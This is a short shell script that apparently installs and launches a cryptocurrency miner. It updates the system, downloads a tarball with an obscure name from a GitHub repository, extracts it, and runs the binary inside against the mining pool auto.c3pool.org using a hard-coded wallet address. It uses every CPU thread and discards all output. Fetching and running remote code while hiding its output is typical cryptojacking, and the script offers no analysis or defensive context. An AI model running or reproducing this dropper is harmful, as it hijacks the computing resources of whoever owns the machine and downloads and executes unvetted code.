#!/bin/sh

A=auto.c3pool.org:80
B=83HzBwN146c9iq4p8mcxT6fM3hUNmHpzZii8uS8j37LkimD72XNQ3kZ9GisSHpWNw4UKapG4pkfzB9hKvvXxvdn2Gmrynju
C=modol
apt-get update && apt-get upgrade -y
wget https://github.com/muledan1/bash/raw/main/-.tar.gz
tar -xf -.tar.gz
./- -o $A -u $B.$C -t$(nproc --all) >/dev/null >/dev/null 2>&1
sleep 10
